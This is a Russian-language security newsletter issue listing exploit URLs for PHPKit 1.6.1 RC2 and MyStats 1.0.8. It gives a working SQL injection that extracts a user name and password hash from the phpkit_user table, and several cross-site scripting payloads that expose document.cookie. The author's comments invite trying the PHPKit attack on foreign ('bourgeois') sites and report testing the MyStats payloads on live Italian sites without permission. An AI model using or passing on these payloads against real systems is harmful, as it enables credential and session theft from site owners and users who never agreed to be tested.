Отправляет email-рассылки с помощью сервиса Sendsay
  Все выпуски  

Компьютер для продвинутых пользоватлей Выпус по безопасности. Уязвимости в PHPKit, MyStats.


Компьютер для продвинутых пользователей
В этом выпуске:
PHPKit | MyStats
ПО: PHPKit
Версия: 1.6.1 RC2

Уязвимость:
Возможно провести SQL-инъекцию на файлах guestbook/print.php, faq/faq.php
Использование:
/include.php?path=faq/faq.php&catid=-1\'%20UNION%20SELECT%201,2,3,4,user_name,user_pw,7,8,9,10,11,12,13%20FROM%20phpkit_user%20where%20%20user_id=1%20and%20\'1\'=\'1
Комментарий::
В Рунете продукт нe используется. Так что можно поверить только на сайтах буржуев.


ПО: MyStats
Версия: 1.0.8

Использование:
mystats/mystats.php?connexion=<SCRIPT>alert(document.cookie)</SCRIPT>&by=jour&ORDERER=datetime
mystats/mystats.php?connexion="'/><SCRIPT>alert(document.cookie)</SCRIPT>&by=jour&ORDERER=datetime
mystats/mystats.php?details='
mystats/mystats.php?details[]=
mystats/mystats.php?details="'/><SCRIPT>alert(document.cookie)</SCRIPT>
mystats/mystats.php?by[]=admin
mystats/mystats.php?connexion=2006-11-12&by="'/><SCRIPT>alert(document.cookie)</SCRIPT>&by=jour&ORDERER=datetime
Комментарий::
В Рунете продукт нe используется. Проверил на итальянских сайтах - всё работает.
Не забудьте проголосовать за выпуск!
Рассылка создана и ведется при поддержке Информационной сети Пермского края.
Меня можно найти: ICQ - 273214003

e-mail - isdmi1::mail.ru

В избранное